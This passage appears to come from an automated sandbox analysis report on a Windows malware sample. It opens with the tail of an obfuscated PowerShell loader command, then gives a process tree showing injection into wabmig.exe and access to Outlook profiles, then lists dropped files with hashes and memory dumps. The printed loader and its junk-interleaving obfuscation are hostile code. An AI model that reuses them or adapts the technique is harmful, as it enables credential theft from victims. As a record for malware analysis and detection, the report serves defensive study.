ndes$ForbiFseriorrddikeTele eKurvfl,likkoAsfreaLyco dKnatte Gidsds rec)Nedri ');Illuminate (benignant 'Stret$DrikkgIna,gl Chamo ThunbTapl aTi hel Flym: EvneMU pinoFodsvn AutoaMedbesZulubtimpreeCru,brUnfraiRun sa IntelskimmlStokry.demo myt,l=Pseud Shera[unadoSA timyPr ntsCaseltKuvereScreemTryki.R,gneTFir ee eillxcypritSk.ve.SallyE atinTortucUnderoMikr d Dea iL.tmenJellig Over]Indbi:Achen:Inve,ACome SPlutoCTankeISmi eI Pjat.AfledGTil ne PlustFalkoS.ontrtDilapr ntesiin ldn kvalgButan( Bunk$ ClifDTropaeSkaanh SoleyAmanudFyldnrUnderoSlaskgExotieCryptnAntigaoverpt Ved eSllersD ase)Skrum ');Illuminate (benignant 'Spist$HomoggFusspltilskoBoundbDurabaSnufflHplas:Ka muE FraglSpectoMavefrFor igWhik,lS,tsseSkattt InulsAfskr= Maes$SidesMIntrao enannCykelaStikpsUdfldtTow.leRestirMegatiUvanea.esorl Selvlarbe.yUndet.Wit,asSem nuFlag bCen tsAdenot AargrTanghiLangsnFortjgDupli( Ko v$MetodP Pr,ba vulrLngodiYndliaEnsbesM kniaSubdeu Ko fr AftruB agusPrisf, Akk $Tortud.verfr.purguR.dskmNozz.hFjerteAerifaStomad.rbejsTapn,) Vrdi ');Illuminate $Elorglets;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2592
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Polyphobia.chr && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1652
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
                PID:4072
              • C:\Program Files (x86)\windows mail\wabmig.exe
                "C:\Program Files (x86)\windows mail\wabmig.exe"
                5⤵
                  PID:2212
                • C:\Program Files (x86)\windows mail\wabmig.exe
                  "C:\Program Files (x86)\windows mail\wabmig.exe"
                  5⤵
                    PID:3636
                  • C:\Program Files (x86)\windows mail\wabmig.exe
                    "C:\Program Files (x86)\windows mail\wabmig.exe"
                    5⤵
                    • Accesses Microsoft Outlook profiles
                    • Suspicious use of NtCreateThreadExHideFromDebugger
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    • outlook_office_path
                    • outlook_win_path
                    PID:4816

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u0yyucl0.ogp.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-523280732-2327480845-3730041215-1000\0f5007522459c86e95ffcc62f32308f1_a5c5e2ae-85e3-447c-9e0b-c9a7b966d823
            Filesize

            46B

            MD5

            c07225d4e7d01d31042965f048728a0a

            SHA1

            69d70b340fd9f44c89adb9a2278df84faa9906b7

            SHA256

            8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

            SHA512

            23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-523280732-2327480845-3730041215-1000\0f5007522459c86e95ffcc62f32308f1_a5c5e2ae-85e3-447c-9e0b-c9a7b966d823
            Filesize

            46B

            MD5

            d898504a722bff1524134c6ab6a5eaa5

            SHA1

            e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

            SHA256

            878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

            SHA512

            26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Polyphobia.chr
            Filesize

            411KB

            MD5

            8cc3f41f8eb389e168dfefb6c8d3d5e4

            SHA1

            0d9b63c6903242e7b6a8320934109007693a6015

            SHA256

            a5ac06222217caee563724a3f4a6198f2db9c8faade6690ca4646a3208e1f4a2

            SHA512

            efd21158a60207dc440061b4d20a552a1f2d95d7c559994e3a052911006f25fdddfa6ff251e9e1658276f3f847c8b841ae9bbbac4846383d984209af715ac65c

            Download Submit

          • memory/2592-40-0x0000000008830000-0x0000000008DD4000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/2592-36-0x0000000007C00000-0x000000000827A000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/2592-42-0x0000000008DE0000-0x000000000B948000-memory.dmp

            Filesize

            43.4MB

            Download

          • memory/2592-17-0x0000000002AE0000-0x0000000002B16000-memory.dmp

            Filesize

            216KB

            Download

          • memory/2592-18-0x00000000056E0000-0x0000000005D08000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/2592-19-0x0000000005430000-0x0000000005452000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2592-20-0x00000000054D0000-0x0000000005536000-memory.dmp

            Filesize

            408KB

            Download

          • memory/2592-21-0x00000000055B0000-0x0000000005616000-memory.dmp

            Filesize

            408KB

            Download

          • memory/2592-39-0x00000000075C0000-0x00000000075E2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2592-28-0x0000000005D10000-0x0000000006064000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2592-38-0x0000000007620000-0x00000000076B6000-memory.dmp

            Filesize

            600KB

            Download

          • memory/2592-34-0x0000000006380000-0x000000000639E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/2592-35-0x00000000063B0000-0x00000000063FC000-memory.dmp

            Filesize

            304KB

            Download

          • memory/2592-37-0x00000000068F0000-0x000000000690A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/4404-15-0x00007FFDBE673000-0x00007FFDBE675000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4404-29-0x00007FFDBE670000-0x00007FFDBF131000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4404-27-0x00007FFDBE670000-0x00007FFDBF131000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4404-0-0x00007FFDBE673000-0x00007FFDBE675000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4404-12-0x00007FFDBE670000-0x00007FFDBF131000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4404-16-0x00007FFDBE670000-0x00007FFDBF131000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4404-43-0x00007FFDBE670000-0x00007FFDBF131000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4404-61-0x00007FFDBE670000-0x00007FFDBF131000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4404-11-0x00007FFDBE670000-0x00007FFDBF131000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4404-10-0x000001217DE20000-0x000001217DE42000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4816-44-0x0000000000C50000-0x00000000037B8000-memory.dmp

            Filesize

            43.4MB

            Download

          • memory/4816-58-0x0000000000C50000-0x00000000037B8000-memory.dmp

            Filesize

            43.4MB

            Download